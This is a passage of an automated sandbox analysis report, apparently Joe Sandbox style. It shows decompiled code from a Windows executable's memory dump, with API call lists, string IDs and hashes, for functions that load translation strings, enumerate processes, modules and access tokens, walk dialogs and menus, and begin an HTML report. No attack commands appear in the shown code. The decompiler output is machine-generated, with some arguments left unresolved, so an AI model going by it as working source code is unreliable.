
				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                      0x00406466
                                                                                      0x0040647d
                                                                                      0x00406484
                                                                                      0x00406499
                                                                                      0x004064a0
                                                                                      0x004064af
                                                                                      0x004064b4
                                                                                      0x004064bb
                                                                                      0x004064cd
                                                                                      0x004064d2
                                                                                      0x004064d4
                                                                                      0x004064e4
                                                                                      0x004064ea
                                                                                      0x004064ea
                                                                                      0x004064f3
                                                                                      0x00406503
                                                                                      0x00406514
                                                                                      0x00406525
                                                                                      0x0040653b
                                                                                      0x0040654e
                                                                                      0x00406568
                                                                                      0x00406572
                                                                                      0x0040657a
                                                                                      0x00406582
                                                                                      0x0040658a
                                                                                      0x00406596

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00406484
                                                                                      • memset.MSVCRT ref: 004064A0
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                        • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                        • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                        • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                      • wcscpy.MSVCRT ref: 004064E4
                                                                                      • wcscpy.MSVCRT ref: 004064F3
                                                                                      • wcscpy.MSVCRT ref: 00406503
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                      • wcscpy.MSVCRT ref: 0040657A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                      • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                      • API String ID: 3037099051-2314623505
                                                                                      • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                      • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 44%
                                                                                      			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                      0x00409ab0
                                                                                      0x00409ab7
                                                                                      0x00409ac8
                                                                                      0x00409acf
                                                                                      0x00409ad4
                                                                                      0x00409ae0
                                                                                      0x00409ae6
                                                                                      0x00409ae8
                                                                                      0x00409af0
                                                                                      0x00409c3a
                                                                                      0x00409c41
                                                                                      0x00409c67
                                                                                      0x00000000
                                                                                      0x00409c67
                                                                                      0x00409c49
                                                                                      0x00409c50
                                                                                      0x00409c51
                                                                                      0x00409c56
                                                                                      0x00409c57
                                                                                      0x00409c5a
                                                                                      0x00000000
                                                                                      0x00409c64
                                                                                      0x00409b00
                                                                                      0x00409b03
                                                                                      0x00409b06
                                                                                      0x00409b0b
                                                                                      0x00409b10
                                                                                      0x00409ba9
                                                                                      0x00409bac
                                                                                      0x00409bc1
                                                                                      0x00409bc7
                                                                                      0x00409bcc
                                                                                      0x00409bd8
                                                                                      0x00409bf0
                                                                                      0x00409bf2
                                                                                      0x00409c23
                                                                                      0x00409c26
                                                                                      0x00409c2f
                                                                                      0x00409c34
                                                                                      0x00409c34
                                                                                      0x00000000
                                                                                      0x00409c2f
                                                                                      0x00409bf7
                                                                                      0x00409bfb
                                                                                      0x00409c02
                                                                                      0x00409c06
                                                                                      0x00409c0d
                                                                                      0x00409c14
                                                                                      0x00409c17
                                                                                      0x00409c18
                                                                                      0x00409c1b
                                                                                      0x00409c1e
                                                                                      0x00000000
                                                                                      0x00409c1e
                                                                                      0x00409b1f
                                                                                      0x00409b25
                                                                                      0x00409b2a
                                                                                      0x00409b2d
                                                                                      0x00409b33
                                                                                      0x00409b3d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409b4b
                                                                                      0x00409b53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409b6a
                                                                                      0x00409b6c
                                                                                      0x00409b6e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409b77
                                                                                      0x00409b7b
                                                                                      0x00409b82
                                                                                      0x00409b86
                                                                                      0x00409b8d
                                                                                      0x00409b8e
                                                                                      0x00409b94
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409AB7
                                                                                      • memset.MSVCRT ref: 00409ACF
                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                      • _snwprintf.MSVCRT ref: 00409C5A
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • memset.MSVCRT ref: 00409B25
                                                                                      • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                      • memset.MSVCRT ref: 00409BC7
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                      • String ID: %s\%s$GetTokenInformation$Y@
                                                                                      • API String ID: 3504373036-27875219
                                                                                      • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                      • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                      • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                      • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                      0x00409179
                                                                                      0x00409209
                                                                                      0x00409209
                                                                                      0x00409185
                                                                                      0x0040918a
                                                                                      0x0040918f
                                                                                      0x00409208
                                                                                      0x00000000
                                                                                      0x00409191
                                                                                      0x0040919e
                                                                                      0x004091a2
                                                                                      0x004091a7
                                                                                      0x004091af
                                                                                      0x004091b3
                                                                                      0x004091b8
                                                                                      0x004091c0
                                                                                      0x004091c4
                                                                                      0x004091c9
                                                                                      0x004091d1
                                                                                      0x004091d5
                                                                                      0x004091da
                                                                                      0x004091e2
                                                                                      0x004091e6
                                                                                      0x004091eb
                                                                                      0x004091ed
                                                                                      0x004091ed
                                                                                      0x004091eb
                                                                                      0x004091da
                                                                                      0x004091c9
                                                                                      0x004091b8
                                                                                      0x004091ff
                                                                                      0x00409202
                                                                                      0x00409202
                                                                                      0x00000000
                                                                                      0x004091ff

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1182944575-70141382
                                                                                      • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                      • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                      • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                      • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                      0x004090f5
                                                                                      0x00409171
                                                                                      0x00409171
                                                                                      0x004090fd
                                                                                      0x00409103
                                                                                      0x00409107
                                                                                      0x00409170
                                                                                      0x00000000
                                                                                      0x00409170
                                                                                      0x00409116
                                                                                      0x0040911a
                                                                                      0x0040911f
                                                                                      0x00409127
                                                                                      0x0040912b
                                                                                      0x00409130
                                                                                      0x00409138
                                                                                      0x0040913c
                                                                                      0x00409141
                                                                                      0x00409149
                                                                                      0x0040914d
                                                                                      0x00409152
                                                                                      0x0040915a
                                                                                      0x0040915e
                                                                                      0x00409163
                                                                                      0x00409165
                                                                                      0x00409165
                                                                                      0x00409163
                                                                                      0x00409152
                                                                                      0x00409141
                                                                                      0x00409130
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                      • API String ID: 667068680-3953557276
                                                                                      • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                      • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 56%
                                                                                      			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                      0x00409faf
                                                                                      0x00409fb4
                                                                                      0x00409fb5
                                                                                      0x00409fb6
                                                                                      0x0040a043
                                                                                      0x0040a04a
                                                                                      0x0040a058
                                                                                      0x0040a05f
                                                                                      0x0040a06d
                                                                                      0x0040a074
                                                                                      0x0040a08e
                                                                                      0x0040a099
                                                                                      0x0040a0ab
                                                                                      0x0040a0c9
                                                                                      0x0040a0ce
                                                                                      0x00000000
                                                                                      0x0040a0ce
                                                                                      0x00409fc3
                                                                                      0x00409fca
                                                                                      0x00409fd8
                                                                                      0x00409fdf
                                                                                      0x00409ff9
                                                                                      0x0040a006
                                                                                      0x0040a018
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: %%0.%df
                                                                                      • API String ID: 3473751417-763548558
                                                                                      • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                      • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 51%
                                                                                      			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                      0x00406216
                                                                                      0x0040621b
                                                                                      0x00406222
                                                                                      0x0040625f
                                                                                      0x00406263
                                                                                      0x00406269
                                                                                      0x00406271
                                                                                      0x00406273
                                                                                      0x00406289
                                                                                      0x00406289
                                                                                      0x0040628e
                                                                                      0x0040628f
                                                                                      0x004062a9
                                                                                      0x004062ab
                                                                                      0x004062ad
                                                                                      0x004062b0
                                                                                      0x004062c3
                                                                                      0x004062c3
                                                                                      0x004062d3
                                                                                      0x004062da
                                                                                      0x004062f1
                                                                                      0x004062f7
                                                                                      0x004062fe
                                                                                      0x0040630d
                                                                                      0x00406312
                                                                                      0x0040631e
                                                                                      0x00406327
                                                                                      0x00406275
                                                                                      0x00406283
                                                                                      0x00406283
                                                                                      0x00406285
                                                                                      0x00406287
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406277
                                                                                      0x0040627a
                                                                                      0x00406280
                                                                                      0x00406280
                                                                                      0x00000000
                                                                                      0x00406280
                                                                                      0x00000000
                                                                                      0x0040627a
                                                                                      0x00000000
                                                                                      0x00406283
                                                                                      0x00406273
                                                                                      0x00406224
                                                                                      0x00406224
                                                                                      0x00406229
                                                                                      0x0040622a
                                                                                      0x0040622f
                                                                                      0x00406236
                                                                                      0x0040623c
                                                                                      0x00406243
                                                                                      0x00406245
                                                                                      0x00406247
                                                                                      0x00406248
                                                                                      0x0040624b
                                                                                      0x00406254
                                                                                      0x00406254
                                                                                      0x0040632d
                                                                                      0x00406334

                                                                                      APIs
                                                                                      • LoadMenuW.USER32 ref: 00406236
                                                                                        • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                        • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                        • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                        • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                      • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                      • CreateDialogParamW.USER32 ref: 004062A9
                                                                                      • GetDesktopWindow.USER32 ref: 004062B4
                                                                                      • CreateDialogParamW.USER32 ref: 004062C1
                                                                                      • memset.MSVCRT ref: 004062DA
                                                                                      • GetWindowTextW.USER32 ref: 004062F1
                                                                                      • EnumChildWindows.USER32 ref: 0040631E
                                                                                      • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                        • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                      • String ID: caption
                                                                                      • API String ID: 973020956-4135340389
                                                                                      • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                      • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 65%
                                                                                      			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
